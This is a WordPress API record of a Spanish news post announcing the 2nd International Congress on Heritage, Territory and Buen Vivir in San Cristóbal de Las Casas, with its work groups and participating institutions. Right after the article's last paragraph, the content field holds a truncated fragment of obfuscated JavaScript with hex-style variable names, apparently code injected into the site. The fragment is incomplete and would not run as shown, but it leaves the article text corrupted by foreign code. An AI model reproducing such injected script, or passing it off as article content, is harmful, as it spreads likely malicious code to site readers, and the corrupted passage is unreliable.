{"id":5265,"date":"2022-09-21T02:46:18","date_gmt":"2022-09-21T02:46:18","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5265"},"modified":"2022-09-21T02:46:19","modified_gmt":"2022-09-21T02:46:19","slug":"publican-programa-del-2do-congreso-internacional-patrimonio-territorio-y-buen-vivir","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5265","title":{"rendered":"Publican programa del 2do Congreso Internacional Patrimonio, Territorio y Buen Vivir"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"766\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-20-at-6.07.20-PM-1024x766.jpeg\" alt=\"\" class=\"wp-image-5266\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-20-at-6.07.20-PM-1024x766.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-20-at-6.07.20-PM-300x224.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-20-at-6.07.20-PM-768x574.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-20-at-6.07.20-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- La Universidad Intercultural de Chiapas (Unich) ser\u00e1 sede del \u201c2do Congreso Internacional Patrimonio, Territorio y Buen Vivir\u201d, en San Crist\u00f3bal de Las Casas, a celebrarse del 25 al 27 de octubre 2022, donde participan m\u00e1s 21 instituciones y Asociaciones Civiles en \u00e1mbito nacional e internacional, que se puede ver en el programa difundido.<\/p>\n\n\n\n<p>\u201cEl objetivo general es Generar intercambio y debate de alto nivel sobre la situaci\u00f3n actual del Patrimonio, Territorio y Buen Vivir como abordajes te\u00f3ricos, metodol\u00f3gicos, epist\u00e9micos y pr\u00e1cticos desde el campo de la investigaci\u00f3n, la docencia y los movimientos sociales regionales de distintos pa\u00edses\u201d, dijo Miguel S\u00e1nchez \u00c1lvarez, coordinador del 2\u00ba Congreso.<\/p>\n\n\n\n<p>Explic\u00f3 que las participaciones se distribuir\u00e1n en cinco Grupos de Trabajos: Patrimonio Biocultural, Caracterizaciones ling\u00fc\u00edsticas e Interculturalidades; Migraci\u00f3n, Fronteras y Pandemia; Buen Vivir, G\u00e9nero, Econom\u00eda Social Solidaria; Territorios en Disputa y Resistencias Sociales, e) Pol\u00edticas P\u00fablicas, Megaproyectos, Recursos Estrat\u00e9gicos y Resistencias.<\/p>\n\n\n\n<p>\u201cEn esta ocasi\u00f3n participan diversas instituciones nacional e internacional como el Departamento de Sociolog\u00eda de la Facultad de Ciencias Sociales, UNAH, Honduras, Fundaci\u00f3n Comunidad Sustentable, Bolivia, Grupo de Trabajo Fronteras, Regionalizaci\u00f3n y Globalizaci\u00f3n del Consejo Latinoamericano de Ciencias Sociales \u2013 CLACSO, Seminario Permanente de Estudios Chicanos y de Fronteras (DEAS-INAH), Centro de Investigaciones en Estudios Superiores en Antropolog\u00eda Social (CIESAS-Sureste), Posgrado en Desarrollo Rural Regional, Universidad Aut\u00f3noma Chapingo (UACH)\u201d.<\/p>\n\n\n\n<p>Adem\u00e1s del Grupo de Investigaci\u00f3n \u201cMemoria, Historia, Espacio y Sociedad, Centro de Estudios Superiores de M\u00e9xico y Centroam\u00e9rica (CESMECA), Universidad de Ciencias y Artes de Chiapas (UNICACH), Cuerpo Acad\u00e9mico \u201cEstudios Mesoamericanos\u201d, Facultad de Ciencias Sociales, Universidad Aut\u00f3noma de Chiapas (UNACH), Facultad de Humanidades, la Maestr\u00eda en Estudios Interculturales (MEI), la Maestr\u00eda en Econom\u00eda Social Solidaria (MESS), entre otras.<\/p>\n\n\n\n<p>Dijo que el programa ya est\u00e1 publicado en la p\u00e1gina de la UNICH, y pueden inscribirse aun para ser parte de las diversas actividades a realizarse.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal San Crist\u00f3bal de Las Casas.- La Universidad Intercultural de Chiapas (Unich) ser\u00e1 sede del \u201c2do Congreso Internacional Patrimonio, Territorio y Buen Vivir\u201d, en San Crist\u00f3bal de Las Casas, a celebrarse del 25 al 27 de octubre 2022, donde participan m\u00e1s 21 instituciones y Asociaciones Civiles en \u00e1mbito nacional e internacional, que se puede &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5266,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-5265","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5265","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5265"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5265\/revisions"}],"predecessor-version":[{"id":5267,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5265\/revisions\/5267"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5266"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5265"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5265"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5265"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}